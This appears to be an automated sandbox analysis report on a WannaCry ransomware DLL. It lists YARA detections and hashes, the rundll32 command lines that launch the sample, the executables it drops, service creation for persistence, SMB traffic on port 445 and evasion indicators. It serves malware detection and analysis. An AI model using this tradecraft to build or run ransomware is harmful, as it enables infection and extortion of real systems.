                  Source: 8.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 8.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 8.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.2.mssecsvr.exe.24e2948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.24e2948.9.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.2.mssecsvr.exe.1fba104.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.1fba104.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 5.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 5.0.mssecsvr.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 5.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 5.0.mssecsvr.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 5.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 5.2.mssecsvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: 7.2.mssecsvr.exe.24de8e8.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.1fb60a4.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 7.2.mssecsvr.exe.1fba104.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: C:\Windows\mssecsvr.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: C:\Windows\mssecsvr.exe, type: DROPPEDMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                  Source: C:\Windows\tasksche.exeFile deleted: C:\Windows\__tmp_rar_sfx_access_check_4731812Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\WINDOWS\mssecsvr.exeJump to behavior
                  Source: C:\Windows\tasksche.exeCode function: String function: 0041AAF0 appears 49 times
                  Source: C:\Windows\tasksche.exeCode function: String function: 0041A4DC appears 37 times
                  Source: C:\Windows\tasksche.exeCode function: String function: 0041FA9C appears 38 times
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040690A: __EH_prolog,_wcslen,_wcscpy,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,_wcscpy,_wcscpy,_wcscpy,_wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,9_2_0040690A
                  Source: mssecsvr.exe.3.drStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                  Source: mssecsvr.exe.3.drStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                  Source: eee.exe.9.drStatic PE information: No import functions for PE file found
                  Source: xIwkOnjSIa.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\tasksche.exeFile created: C:\Users\user\New folderJump to behavior
                  Source: classification engineClassification label: mal100.rans.troj.expl.evad.winDLL@32/8@6/100
                  Source: C:\Windows\mssecsvr.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00407C40
                  Source: C:\Windows\mssecsvr.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,7_2_00407C40
                  Source: C:\Windows\tasksche.exeFile read: C:\Windows\win.iniJump to behavior
                  Source: C:\Windows\mssecsvr.exeCode function: 5_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,5_2_00408090
                  Source: C:\Windows\mssecsvr.exeCode function: 7_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,7_2_00408090
                  Source: C:\Windows\mssecsvr.exeCode function: 5_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00407C40
                  Source: C:\Windows\mssecsvr.exeCode function: 5_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,5_2_00407CE0
                  Source: xIwkOnjSIa.dllReversingLabs: Detection: 92%
                  Source: xIwkOnjSIa.dllVirustotal: Detection: 90%
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll"
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\xIwkOnjSIa.dll,PlayGame
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvr.exe C:\WINDOWS\mssecsvr.exe
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",PlayGame
                  Source: unknownProcess created: C:\Windows\mssecsvr.exe C:\WINDOWS\mssecsvr.exe -m security
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvr.exe C:\WINDOWS\mssecsvr.exe
                  Source: C:\Windows\mssecsvr.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                  Source: C:\Windows\mssecsvr.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\xIwkOnjSIa.dll,PlayGameJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",PlayGameJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xIwkOnjSIa.dll",#1Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvr.exe C:\WINDOWS\mssecsvr.exeJump to behavior
                  Source: C:\Windows\mssecsvr.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvr.exe C:\WINDOWS\mssecsvr.exeJump to behavior
                  Source: C:\Windows\mssecsvr.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Windows\mssecsvr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00406553 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_00406553
                  Source: C:\Windows\tasksche.exeCode function: 9_2_00419BB0 CoCreateInstance,9_2_00419BB0
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\xIwkOnjSIa.dll,PlayGame
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5920:120:WilError_01
                  Source: C:\Windows\tasksche.exeCommand line argument: sfxname9_2_0040FEF0
                  Source: C:\Windows\tasksche.exeCommand line argument: sfxstime9_2_0040FEF0
                  Source: C:\Windows\tasksche.exeCommand line argument: STARTDLG9_2_0040FEF0
                  Source: C:\Windows\tasksche.exeCommand line argument: @CB9_2_00424290
                  Source: C:\Windows\mssecsvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\mssecsvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\mssecsvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\mssecsvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\mssecsvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\mssecsvr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeAutomated click: OK
                  Source: C:\Windows\tasksche.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: xIwkOnjSIa.dllStatic file information: File size 5267459 > 1048576
                  Source: xIwkOnjSIa.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
                  Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: tasksche.exe, 00000009.00000000.254394679.000000000042A000.00000002.00000001.01000000.00000006.sdmp, tasksche.exe, 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmp, tasksche.exe, 0000000A.00000002.765126869.000000000042A000.00000002.00000001.01000000.00000006.sdmp, tasksche.exe, 0000000A.00000000.259120433.000000000042A000.00000002.00000001.01000000.00000006.sdmp, xIwkOnjSIa.dll, mssecsvr.exe.3.dr, tasksche.exe.5.dr
                  Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20221222_180435_142.etl.19.dr
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041FAE1 push ecx; ret 9_2_0041FAF4
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0041A4DC push eax; ret 9_2_0041A4FA
                  Source: C:\Windows\tasksche.exeCode function: 9_2_0040CEB6 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040CEB6
                  Source: C:\Windows\tasksche.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_4731812Jump to behavior

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\WINDOWS\mssecsvr.exeJump to behavior
                  Source: C:\Windows\mssecsvr.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
                  Source: C:\Windows\mssecsvr.exeFile created: C:\WINDOWS\qeriuwjhrf (copy)Jump to dropped file
                  Source: C:\Windows\tasksche.exeFile created: C:\Windows\eee.exeJump to dropped file
                  Source: C:\Windows\mssecsvr.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvr.exeJump to dropped file
                  Source: C:\Windows\mssecsvr.exeFile created: C:\WINDOWS\qeriuwjhrf (copy)Jump to dropped file
                  Source: C:\Windows\tasksche.exeFile created: C:\Windows\eee.exeJump to dropped file
                  Source: C:\Windows\mssecsvr.exeFile created: C:\Windows\tasksche.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvr.exeJump to dropped file
                  Source: C:\Windows\mssecsvr.exeCode function: 5_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00407C40

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 59611
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 59794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 59900
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60220
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60550
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60656
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60986
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 60994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 61330
                  Source: unknownNetwork traffic detected: HTTP traffic on port 445 -> 61444
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\mssecsvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\mssecsvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\mssecsvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\mssecsvr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\tasksche.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Windows\mssecsvr.exe TID: 5232Thread sleep count: 90 > 30Jump to behavior
                  Source: C:\Windows\mssecsvr.exe TID: 5232Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Windows\mssecsvr.exe TID: 5156Thread sleep count: 219 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\mssecsvr.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\tasksche.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_9-19228
                  Source: C:\Windows\tasksche.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_9-19428
                  Source: C:\Windows\tasksche.exeDropped PE file which has not been started: C:\Windows\eee.exeJump to dropped file
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                  Source: C:\Windows\tasksche.exeAPI call chain: ExitProcess graph end nodegraph_9-19230
                  Source: tasksche.exe, 00000009.00000003.636793323.0000000005E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_
